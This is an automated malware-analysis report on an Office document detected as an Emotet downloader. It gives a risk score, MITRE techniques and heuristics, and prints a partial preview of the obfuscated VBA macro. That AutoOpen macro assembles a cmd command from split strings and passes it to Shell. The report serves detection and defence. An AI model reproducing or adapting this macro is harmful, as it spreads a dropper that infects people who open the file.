MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The `AutoOpen` macro is present, which is a common technique for executing malicious code upon opening the document. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6883997-0', strongly suggesting the Emotet family. The VBA script attempts to construct and execute a command, likely to download and run a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6883997-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883997-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5640 bytes |
SHA-256: f99d725a484b4b8f0f344914b519557eecb8c78fbc9ff182be34c5c7d5d803f0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NvPcFiPp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName ChrB(aQikRU)
TypeName Round(9795 - PVOmTL)
TypeName Hex(1)
TypeName CDate(4)
TypeName CBool(918)
Shell@ CStr("c") + CStr("m") + pECLAjtCjwfWX + fwQpEYk + zVfEVdDbLw + OvjYED + iOLwDqE + ujHOZYuUzwX + DkZsPWdPpPQ + OkhZLroNHVudK, 426826034 - 426826034
TypeName CSng(ZmGBEl)
TypeName ahjCE
TypeName ChrW(9)
End Sub
Attribute VB_Name = "AuNJzwvRFqPw"
Function zVfEVdDbLw()
On Error Resume Next
TypeName 8055
TypeName CStr(80)
TypeName Cos(849)
UYDZW = "d /V/C" + CStr(Chr(skPmKzwiiTdO + slXfLlFZIVQoWX + 34 + ZlmqUclOK + hniLZfjOqkrY)) + "s" + "et 08" + "Si=pd" + "NMrkhWA" + "Sfuw" + "hzC"
TypeName Sqr(258072599)
TypeName Round(933)
QvjOL = "juQ" + "Fwidzl" + "QV" + "GOa" + "cj,-;9b8" + "@nH1g$D3{4"
TypeName 6
TypeName 6354
TypeName Rnd(oRGnL - FofQHQ / pwpQlq / djKBDL)
nHEnYwN = "\mxo" + "B)( XPyte" + "sIK.q" + "=5L+v" + "/':R}&" + "&for %l " + "in (0;5"
TypeName Int(OaJpb / cqrqYi)
TypeName 53
TypeName 2
MDXaFz = "1;2" + "0;60" + ";4;" + "61;13;6" + "0;"
TypeName HFkAB
TypeName ChrB(531)
TypeName Cos(QPRRsj)
bSzjWTtF = "24;24;" + "5" + "5;43;5" + "6;" + "3" + "1;3" + "0;66;3" + "9;60;" + "20;3" + "3"
TypeName Hex(TzBGj)
TypeName CBool(iIACm)
SpopK = ";5" + "1;36" + ";31;60;30" + ";59;55;2;" + "60;59;" + "64;7;60;36" + ";15;24;21;" + "60;39;59" + ";34" + ";43;" + "31;10;52"
TypeName rVjtr
TypeName 4840
TypeName Fix(QfqEiV)
hXKDMHtP = ";66;72;" + "13" + ";59;" + "59" + ";0;73;71;7" + "1;59;39" + ";10;21;4" + ";" + "6"
TypeName Sgn(KLOmJj)
TypeName CDbl(52)
liNlLCoXiU = "1;5" + "9;64;3" + "0;51;49;" + "71;" + "0" + ";56" + ";68;38;" + "13" + ";59;59" + ";0;73;71;7"
TypeName Isjztf
TypeName Rnd(QbYtk)
TypeName Atn(fVAoLo)
fGwWPhPi = "1;59;13;" + "60;" + "59;4;60" + ";60" + ";49;51;" + "7" + "0;21;6" + "0;64;30;" + "51" + ";49;71;6"
TypeName ChrB(czMii * QkrRWY)
TypeName ChFzT
TypeName 952
ERPnccD = "7;0;" + "59;20;" + "74;3;26;65" + ";38;" + "13;59" + ";59;0;73;7" + "1;71;20;20" + ";2" + "0;64;61;17" + ";" + "39;22;" + "29;58;0;"
zVfEVdDbLw = UYDZW + QvjOL + nHEnYwN + MDXaFz + bSzjWTtF + SpopK + hXKDMHtP + liNlLCoXiU + fGwWPhPi + ERPnccD
TypeName aFmTn
TypeName Atn(4)
End Function
Function OvjYED()
On Error Resume Next
TypeName Oct(jbVtSJ / uFQzt + 33138 * XXQVM)
TypeName CBool(JGzmZv)
TypeName Chr(8)
WECjh = "24;29" + ";39" + ";39;21;39" + ";42;64" + ";30;51;" + "49;71;" + "51;40;5;" + "3;3" + "8;1" + "3;59;59;0" + ";73"
TypeName jTusXW
TypeName XvDOfY
WAAbKs = ";71" + ";71;59" + ";60;5" + ";" + "5;58;64;3" + "9;60;59;" + "7" + "1;42" + ";13;23;2;2"
TypeName CDbl(PvXQvS + nROtjk)
TypeName CByte(wlokj / ditcbj)
TypeName CSng(cSNaWP)
unAvFQTdh = "8;38;1" + "3;5" + "9;59;0;7" + "3;71;71" + ";59;60" + ";30;" + "24;60;20;" + "60" + ";36;"
TypeName Rnd(oABEFI)
TypeName nhalN
SmutaXCOYj = "64;30;" + "51" + ";49;64" + ";36;" + "4;71;10;27" + ";7;35;47;" + "51;2" + "1;30;" + "72" + ";64;9" + ";" + "0;24;21;59" + ";54;72;38"
TypeName Chr(hPuYiG * NJojAD)
TypeName GXkZZV
GDLnkrz = ";72;53" + ";34;4" + "3;31" + ";21;51;5" + "5;66;55;" + "72;41;45;3" + "7;72;34;4" + "3" + ";63;6" + "3;0;66;43;" + "60;39;7" + "0;73;5"
TypeName Atn(86124 - iBDFsQ)
TypeName ChrW(534)
zVIRoiCAc = "9;6" + "0;4" + "9;0;69" + ";7" + "2;48;72;69" + ";43"
TypeName ChrW(88149 * bhDiS / uRbYzi - TOckHR)
TypeName 767
NGijU = ";31;21;5" + "1;69;7" + "2;64;60;50" + ";60;72;3" + "4;10;51;" + "4;60;29" + ";30;13;54;" + "43;57;2"
TypeName vEiHRY
TypeName Log(44110 / minnG + 47681 / vZjHd)
TypeName Sqr(NOQfqj + GhQcRC)
LwSiwM = "0;62;55" + ";21;39;" + "55;4" + "3;31;1" + "0;52;53" + ";46;" + "59;4;58;46" + ";43;56;3" + "1;30;64;"
TypeName Hex(395163932)
Ty
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.